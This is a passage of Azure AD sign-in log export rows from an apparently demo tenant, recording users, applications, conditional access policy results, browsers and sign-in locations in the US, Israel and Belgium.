{'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 17:36,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",62115b57-0cb2-458e-8ba0-179e638d1a00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 Exchange Online,62115b57-0cb2-458e-8ba0-179e638d1a00,SigninLogs,Sucess,33.7984581,-84.38828278
+550,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,36:28.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,5e6a1aeb-0e3f-41f0-ac27-46737a9d6b4f,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 17:36,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",62115b57-0cb2-458e-8ba0-179e6f8d1a00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,62115b57-0cb2-458e-8ba0-179e6f8d1a00,SigninLogs,Sucess,33.7984581,-84.38828278
+551,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,36:29.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,b493d553-2b45-46cf-b9f6-5148d945e8d4,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 17:36,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",62115b57-0cb2-458e-8ba0-179e908d1a00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,62115b57-0cb2-458e-8ba0-179e908d1a00,SigninLogs,Sucess,33.7984581,-84.38828278
+552,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,56:51.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,a0b0f6e7-96cb-4afc-99b2-a9117e291e66,Microsoft.aadiam,Microsoft.aadiam,,PC Admin,4,IL,Graph explorer,de8bc8b5-d9f9-48b1-a8ad-b748da725064,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",success,09/04/2020 18:56,"{'operatingSystem': 'Windows 10', 'deviceId': 'b50c9774-c742-4b80-8769-ecd14859e7c3', 'browser': 'Edge 80.0.361', 'displayName': 'yanivsh-su', 'trustType': 'Azure AD registered'}",30f34fe8-f8af-4114-b479-b462fbc20100,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 34.85319900512695, 'latitude': 32.32146072387695}, 'state': 'Hamerkaz', 'city': 'Netanya'}",none,none,none,none,[],{'errorCode': 0},PC Admin,95289cbf-4ab6-46f3-804b-c9a6f2ef1227,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,30f34fe8-f8af-4114-b479-b462fbc20100,SigninLogs,Sucess,32.32146072,34.85319901
+553,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,58:19.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,e148ea43-106b-4bed-a542-c067b42f3978,Microsoft.aadiam,Microsoft.aadiam,,Julian Isla,4,BE,Skype Web Experience On Office 365,e48d4214-364e-4731-b2b6-47dabf529218,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}]",notApplied,09/04/2020 16:58,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",0db84f87-d59a-4024-94d6-18fb6e481c00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Julian Isla,2935e535-8fdf-4217-865b-e084cb7214f1,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Skype for Business Online,0db84f87-d59a-4024-94d6-18fb6e481c00,SigninLogs,Sucess,50.6406517,5.572050095
+554,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,56:08.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,8de4ac4e-b5a5-40a1-9687-d713e337fe3d,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Microsoft Cloud App Security,05a65629-4c1b-48c1-a78b-804c4abdd4af,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 19:56,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",028ee73f-e71d-464b-b4fd-9db203252000,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,028ee73f-e71d-464b-b4fd-9db203252000,SigninLogs,Sucess,33.7984581,-84.38828278
+555,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:26.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,0ed7fdbe-beb6-4dd2-ad9c-e6bdbd4e876a,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 17:21,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",82df5368-1a8b-4fb8-b076-b0dff6521b00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,82df5368-1a8b-4fb8-b076-b0dff6521b00,SigninLogs,Sucess,36.6404686,-78.26995087
+556,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,39:19.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,df2414e9-c1e8-4460-9c84-e01faf14638f,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test 